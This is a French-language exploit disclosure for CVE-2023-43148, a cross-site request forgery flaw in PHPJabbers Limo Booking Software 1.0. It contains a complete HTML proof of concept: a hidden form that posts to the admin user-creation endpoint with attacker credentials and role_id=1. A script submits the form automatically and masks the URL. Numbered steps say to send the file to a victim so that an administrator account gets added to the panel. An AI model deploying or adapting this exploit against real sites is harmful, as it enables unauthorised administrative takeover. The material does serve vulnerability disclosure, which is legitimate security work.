
CVE-2023-43148
Fournisseur : PHPJabbers
Page d'accueil du fournisseur : https://www.phpjabbers.com/
Lien du logiciel : https://www.phpjabbers.com/limo-booking-software
Version : 1.0
Testé sur : Windows 10 Pro
Impact : Ajouter un utilisateur attaquant avec privilèges administrateur
CVE :
Vulnérabilité de type Cross Site Request Forgery dans limo-booking-software permettant à un attaquant distant d'exécuter l'ajout d'un utilisateur avec privilèges administrateur
POC 1 - Créez un fichier avec ce CODE et ENREGISTREZ-le en HTML. Si vous enregistrez une nouvelle requête pour faire un CSRF, assurez-vous de changer role_id=0 en 1 (role_id=1)
<html>
<body>
<form action="https://demo.phpjabbers.com/1694190842_980/index.php?controller=pjAdminUsers&action=pjActionCreate" method="POST">
<input type="hidden" name="user_create" value="1" />
<input type="hidden" name="role_id" value="1" />
<input type="hidden" name="email" value="hacker@admin.tor" />
<input type="hidden" name="password" value="admin1234" />
<input type="hidden" name="name" value="admintor" />
<input type="hidden" name="phone" value="" />
<input type="hidden" name="status" value="T" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
2 - Exemple test.html
3 - Envoyer à la victime
4 - Lorsque la victime ouvre le fichier HTML, le fichier test.html s'ouvre dans son navigateur. Quand il clique sur le bouton, le code modifie sa session en cours et un utilisateur avec privilèges administrateur est ajouté au panneau d'administration.